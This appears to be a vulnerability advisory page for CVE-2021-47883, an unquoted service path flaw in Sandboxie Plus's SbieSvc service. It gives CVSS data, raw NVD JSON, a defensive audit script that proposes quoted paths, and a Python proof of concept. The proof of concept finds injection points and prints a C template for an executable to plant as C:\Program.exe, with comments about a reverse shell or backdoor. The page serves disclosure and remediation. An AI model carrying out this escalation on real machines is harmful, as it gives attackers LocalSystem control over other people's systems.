Security Vulnerability Report
CVE-2021-47883 CVSS 7.8 HIGH

CVE-2021-47883

Published: 2026-01-21 18:16:23
Last Modified: 2026-04-15 00:35:42

Description

Sandboxie Plus 0.7.2 contains an unquoted service path vulnerability in the SbieSvc service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Sandboxie Plus < 0.7.2 (likely all versions prior to fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2021-47883 PoC - Sandboxie Plus SbieSvc Unquoted Service Path

This PoC demonstrates the unquoted service path vulnerability in
Sandboxie Plus SbieSvc service.
Note: This is for educational and authorized testing purposes only.
"""
import subprocess


def check_service_path():
    """Check if SbieSvc has unquoted path vulnerability"""
    try:
        # Query service configuration using sc qc command
        result = subprocess.run(
            ['sc', 'qc', 'SbieSvc'],
            capture_output=True,
            text=True
        )
        output = result.stdout
        print("[*] SbieSvc Service Configuration:")
        print(output)

        # Check if BINARY_PATH_NAME contains spaces and no quotes
        if 'BINARY_PATH_NAME' in output:
            lines = output.split('\n')
            for line in lines:
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f"\n[*] Service Path: {path}")

                    # Check for vulnerability conditions
                    if ' ' in path and not path.startswith('"'):
                        print("[!] VULNERABLE: Path contains spaces without quotes!")
                        # Extract path components
                        parts = path.split()
                        print("[*] Potential injection points:")
                        for i in range(len(parts) - 1):  # Exclude filename
                            # Rejoin on the space the path was split on
                            potential_path = ' '.join(parts[:i + 1])
                            print(f" - {potential_path}.exe")
                    else:
                        print("[+] NOT VULNERABLE: Path is properly quoted")
    except Exception as e:
        print(f"[-] Error: {e}")


def create_malicious_executable():
    """Generate template for malicious executable creation"""
    # This would be the malicious executable code
    # For demonstration purposes only
    evil_code = '''
#include <windows.h>

int main() {
    // Malicious code would be placed here
    // This would typically create a reverse shell or add a backdoor
    // Executed with LocalSystem privileges
    MessageBox(NULL, "CVE-2021-47883 Exploited - Sandboxie Plus SbieSvc",
               "Privilege Escalation", MB_OK | MB_ICONWARNING);
    return 0;
}
'''
    print("\n[*] Example malicious executable code template:")
    print(evil_code)
    print("[*] Compile and place as 'Program.exe' in C:\\ to exploit")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2021-47883 - Sandboxie Plus SbieSvc Unquoted Path")
    print("=" * 60)
    check_service_path()
    create_malicious_executable()
    print("\n[*] Reminder: Always obtain proper authorization before testing")
```
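An audit-side counterpart to the check above, as an added example that is not part of the original page or of the Sandboxie project: it separates the executable from its arguments before testing for spaces, so svchost-style entries are not flagged, and it returns the quoted value to write back as the service's binary path. The sample paths (including the SbieSvc install directory) are constructed, and the extension-based split is a heuristic.

```python
import re

# Constructed ImagePath values of the kind `sc qc` prints as BINARY_PATH_NAME.
# The SbieSvc install directory is an assumption, not taken from the advisory.
SAMPLES = {
    "SbieSvc": r"C:\Program Files\Sandboxie-Plus\SbieSvc.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" --run',
    "SvcHostLike": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "ArgsSvc": r"C:\Program Files\Vendor App\agent.exe /service",
}

# Heuristic: the executable ends at the first launchable extension that is
# followed by whitespace or end of string; everything after it is arguments.
EXE_END = re.compile(r"\.(exe|com|bat|cmd)(?=\s|$)", re.IGNORECASE)

def split_image_path(image_path):
    """Return (executable, arguments) for a service ImagePath string."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:                      # unbalanced quote: treat all as path
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    m = EXE_END.search(s)
    if m is None:                          # e.g. driver paths; nothing to split
        return s, ""
    return s[:m.end()], s[m.end():].strip()

def audit(image_path):
    """Classify one ImagePath and propose the quoted replacement (CWE-428)."""
    s = image_path.strip()
    exe, args = split_image_path(s)
    # Only spaces inside the executable path matter, not spaces before arguments.
    unquoted = not s.startswith('"') and " " in exe
    fixed = f'"{exe}"' + (f" {args}" if args else "")
    return {
        "executable": exe,
        "arguments": args,
        "unquoted_with_spaces": unquoted,
        "remediated": fixed if unquoted else s,
    }

def audit_all(services):
    """Map service name -> audit result for a dict of ImagePath strings."""
    return {name: audit(path) for name, path in services.items()}

if __name__ == "__main__":
    for name, r in audit_all(SAMPLES).items():
        print(f"{name:12} flagged={r['unquoted_with_spaces']!s:5} -> {r['remediated']}")
```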

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47883", "sourceIdentifier": "[email protected]", "published": "2026-01-21T18:16:22.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandboxie Plus 0.7.2 contains an unquoted service path vulnerability in the SbieSvc service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Sandboxie Plus 0.7.2 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio SbieSvc que permite a atacantes locales ejecutar código con privilegios elevados. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se iniciarán con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://sandboxie-plus.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49631", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/sandboxie-plus-sbiesvc-unquoted-service-path", "source": "[email protected]"}]}}